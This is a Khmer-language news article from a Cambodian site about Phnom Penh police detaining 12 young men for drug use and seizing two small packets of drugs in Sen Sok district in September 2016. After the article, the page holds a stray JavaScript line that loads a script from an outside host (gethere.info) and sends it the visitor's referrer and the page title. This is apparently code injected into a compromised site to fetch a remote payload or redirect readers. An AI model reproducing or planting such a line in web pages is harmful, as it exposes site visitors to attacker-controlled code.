ឃាត់ខ្លួនអ្នកប្រើប្រាស់ថ្នាំញៀន១២នាក់ និងដកហូតថ្នាំញៀនបានពីរកញ្ចប់តូច

 ភ្នំពេញ ៖ បង្ក្រាបដូចភ្លៀងរលឹមកំលាំងនគរបាលខណ្ឌសែនសុខ និងកំលាំងស្នងការនគរបាលរាជធានីភ្នំពេញ បានសហការគ្នាចុះបង្ក្រាបនិងបានឃាត់ខ្លួនអ្នកប្រើប្រាស់ចំនួន១២ និងដកហូតថ្នាំញៀនបានចំនួន២កញ្ចប់តូចផងដែរ។ ប្រតិបត្តិការនេះដឹកនាំដោយលោកវេរៈសេនីឯក ម៉ក់ ហុង អធិការនគរបាលខណ្ឌសែនសុខនៅចំណុចក្នុងប្លុកបឹងឈូក មុខពេទ្យលោកសង្ឃ កាលពីម៉ោង២១ៈ០០នាទីយប់ថ្ងៃទី២៦ខែកញ្ញាឆ្នាំ ២០១៦ស្ថិតក្នុងភូមិត្រពាំងឈូក សង្កាត់ទឹកថ្លាខណ្ឌសែនសុខ។

លោកវេរៈសេនីយឯក ម៉ក់ ហុង អធិការខណ្ឌ បានមានប្រាប់ឲដឹងថា ដោយមានបទបញ្ជារពីឯកឧត្តមឧត្តមសេនីយ៍ ជួនសុវណ្ណ ស្នងការរាជធានីភ្នំពេញ បញ្ជាមកលោកអោយចុះសហការណ៍និងធ្វើរដ្ឋបាលនៅចំណុចខាងលើដែលជាតំបន់ស្មុកស្មាញទើបលោកបានបង្គាប់សមត្ថកិច្ចមូលដ្ឋានដឹកនាំកំលាំងចុះមកបង្ក្រាបអោយដូចភ្លៀងរលឹមក្នុងនោះឃាត់ខ្លួនក្មេងដែលតែងតែដើរលេងមិនចូលផ្ទះនិងប្រមូលផ្តុំគ្នា ប្រើប្រាស់គ្រឿងញៀនដោយឃាត់ខ្លួនបាន១២នាក់ប្រុស ដកហូតសម្ភារ: ប្រើរប្រាស់មួយចំនួននិងគ្រឿងញៀនបាន២កញ្ចប់តូច។

បច្ចុប្បន្នក្រុមប្រើប្រាស់គ្រឿងញៀនរួមទាំងវត្ថុតាងខាងលើត្រូវបាននាំខ្លួនយកទៅធ្វើការសាកសួរនៅអធិការដ្ឋាននគរបាលខណ្ឌសែនសុខ ដើម្បីធ្វើតេស្តទឹកនោម ដាក់បន្ទុកឡើងតុលាការ៕

98bc0f12-3cef-495e-8f14-bf257d9ceb14

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More